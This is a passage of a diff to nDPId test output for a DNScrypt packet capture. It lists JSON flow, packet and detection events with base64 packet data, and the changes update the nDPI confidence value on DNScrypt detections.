AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":106,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305155} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":106,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1YAub0RlSEKAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1cgAL0RcE0KAAABizvIdJLbAbsGBNikc5ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":108,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305155} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":108,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1cAub0RlSAKAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1ggAL0RcEwKAAABizvIdOc6AbsGBIRDc5IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":110,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305155} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":110,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1gAub0RlR8KAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":946739305187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305187,"pkt":"ZmZmZmZmRERERERECABFAADSF51AADcRFxKLO8h0CgAAAQG76FQAvuw2c5WBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} 
@@ -237,27 +237,27 @@ 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":946739305191,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305191,"pkt":"ZmZmZmZmRERERERECABFAADSF6FAADcRFw6LO8h0CgAAAQG7qnEAviobc5SBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZYtAAL0RdE4KAAABwx5eHLr5IPsCCOQQMs4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZYwgAL0RkI0KAAABwx5eHIJZIPsGBDAsMssBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 